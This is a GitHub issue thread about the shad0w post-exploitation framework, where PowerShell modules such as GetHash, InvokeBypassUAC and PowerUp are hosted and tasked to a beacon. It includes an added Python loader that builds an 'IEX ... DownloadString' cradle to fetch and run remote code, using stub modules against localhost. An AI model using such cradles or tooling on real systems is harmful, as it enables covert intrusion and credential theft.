bats3c / shad0w

A post exploitation framework designed to operate covertly on heavily monitored environments
https://blog.dylan.codes/shad0w/
MIT License

PowerShell modules broken #71

Closed leebaird closed 3 years ago

leebaird commented 3 years ago

When trying to call any of the PowerShell modules, shad0w looks in /root/shad0w/scripts/.

Suggest changing the hardcoded path to a relative path. That way, if shad0w is installed in a different directory like /opt/, all of the modules should work.

shad0w(lee@��$�D) ≫ psh -l
[i] 8 available modules

-        GetHash
-        HostRecon
-        InvokeBypassUAC
-        PowerView
-        BloodHound
-        GetSystem
-        GetComputerInfo
-        PowerUp
shad0w(lee@��$�D) ≫ psh -m GetSystem
[i] Hosting module 'GetSystem' (26498 bytes) => /UrWAPRbCnx
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m GetComputerInfo
[i] Hosting module 'GetComputerInfo' (19028 bytes) => /AaLiQbMQnh
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m PowerUp
[i] Hosting module 'PowerUp' (563259 bytes) => /GQxXuACZpk
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m BloodHound
[i] Hosting module 'BloodHound' (227778 bytes) => /xjpFIVtmpB
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m PowerView
[i] Hosting module 'PowerView' (770038 bytes) => /lAJIJLKHTw
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m InvokeBypassUAC
[i] Hosting module 'InvokeBypassUAC' (407271 bytes) => /sEHXkaJciR
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m HostRecon
[i] Hosting module 'HostRecon' (23436 bytes) => /BFvVxfkcIV
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m GetHash
[i] Hosting module 'GetHash' (22216 bytes) => /NRMMlumHBV
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m zzzzz
ERROR: [Errno 2] No such file or directory: '/root/shad0w/scripts/zzzzz.ps1'

WayneJLee commented 3 years ago

You need to be passing cmdlets from those modules using the -c flag.

Also, this part isn't well documented but the path /root/shad0w/scripts/ refers to the path where shad0w is located within the Docker container.

bats3c commented 3 years ago

That screenshot shows correct functionality. By using the -m flag you are just loading the module not calling any of the code inside it. You must use the -c flag to run a cmdlet from inside the module.

Also as stated in issue #68 using the hardcoded path of /root/shad0w/scripts/ is fine as shad0w is running inside a docker container so that path will always be right when the container is built correctly.
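
Added illustration of the two points made in this thread (the reporter's suggestion to resolve the scripts directory relative to the install location, and the maintainer's distinction between loading a module with -m and running a cmdlet from it with -c). This is example code written for this page, not shad0w's own loader; the module stubs, the download cradle used to build the task, and the path-validation check are all assumptions, and the random 10-character hosting path simply mirrors the `[i] Hosting module ... => /xxxxxxxxxx` lines in the log above.

```python
"""Minimal PowerShell-module loader in the style of the `psh` command shown in
this issue.  Example code added for this page; not shad0w's implementation."""
import os
import re
import secrets
import string
import tempfile

# Constructed stand-ins for real module files such as PowerUp.ps1 (assumption).
SAMPLE_MODULES = {
    "GetSystem": "function Get-System { Write-Output 'stub' }",
    "PowerUp": "function Invoke-AllChecks { Write-Output 'stub' }",
}

# Only plain module names are accepted; a name containing '/' or '..' would
# otherwise be joined onto the scripts directory and read a file outside it.
MODULE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def make_sample_scripts_dir():
    """Write the constructed stubs into a temp dir that plays the role of scripts/."""
    d = tempfile.mkdtemp(prefix="psh-scripts-")
    for name, body in SAMPLE_MODULES.items():
        with open(os.path.join(d, name + ".ps1"), "w", encoding="utf-8") as f:
            f.write(body)
    return d


def scripts_dir(override=None):
    """Resolve scripts/ next to this file (the relative-path suggestion from the
    report) unless an explicit directory, e.g. the container's fixed path, is given."""
    if override is not None:
        return override
    return os.path.join(os.path.dirname(os.path.abspath(__file__)), "scripts")


def list_modules(d):
    """Equivalent of `psh -l`: every *.ps1 in the scripts directory, by base name."""
    return sorted(f[:-4] for f in os.listdir(d) if f.endswith(".ps1"))


def load_module(d, name):
    """Read a module's bytes; raises FileNotFoundError like the 'zzzzz' case above."""
    if not MODULE_NAME_RE.match(name):
        raise ValueError(f"invalid module name: {name!r}")
    path = os.path.join(d, name + ".ps1")
    if not os.path.isfile(path):
        raise FileNotFoundError(f"[Errno 2] No such file or directory: '{path}'")
    with open(path, "rb") as f:
        return f.read()


def random_host_path(length=10):
    """Random URL path of the shape seen in the log, e.g. /UrWAPRbCnx."""
    return "/" + "".join(secrets.choice(string.ascii_letters) for _ in range(length))


def host_module(d, name):
    """Equivalent of `psh -m NAME`: stage the module under a random path.
    Returns (path, size) so the caller can print the 'Hosting module' line."""
    data = load_module(d, name)
    return random_host_path(), len(data)


def build_task(module_url, cmdlet=None):
    """Build the PowerShell the beacon would run.  The download cradle is an
    assumed stand-in, not shad0w's delivery mechanism.  With no cmdlet (-m only)
    the script merely defines its functions; -c appends the call that does work."""
    cradle = f"IEX (New-Object Net.WebClient).DownloadString('{module_url}')"
    return cradle if cmdlet is None else f"{cradle}; {cmdlet}"


if __name__ == "__main__":
    d = make_sample_scripts_dir()
    print(f"[i] {len(list_modules(d))} available modules: {list_modules(d)}")
    path, size = host_module(d, "PowerUp")
    print(f"[i] Hosting module 'PowerUp' ({size} bytes) => {path}")
    print(build_task("http://127.0.0.1" + path, "Invoke-AllChecks"))
```

The `-m` only step returns a task that defines functions and produces no visible result, which is exactly what the log in the report shows; adding the cmdlet via `-c` is what yields output. The name check is the one addition a practitioner would want in any loader that maps a user-supplied module name onto a file under a fixed directory.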

leebaird commented 3 years ago

It would be nice if, when no arguments were given, the help info for the module were displayed.